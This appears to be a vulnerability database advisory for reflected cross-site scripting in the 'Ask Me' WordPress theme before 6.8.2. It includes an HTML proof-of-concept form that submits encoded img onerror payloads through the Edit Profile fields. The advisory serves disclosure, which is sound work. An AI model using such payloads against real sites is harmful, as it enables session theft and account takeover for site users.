Themes Vulnerabilities

Ask Me < 6.8.2 - Reflected Cross-Site Scripting

Description

The theme does not properly sanitise and escape several of the fields in the Edit Profile page, leading to Reflected Cross-Site Scripting issues

Proof of Concept

<html>
  <body>
    <form action="https://example.com/edit_profile/" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="nickname" value="&quot;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;document&#46;domain&#41;&gt;" />
      <input type="hidden" name="email" value="&quot;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;document&#46;cookies&#41;&gt;" />
      <input type="submit" value="Save" />
    </form>
  </body>
</html>

https://www.youtube.com/watch?v=BeDZCyi7csc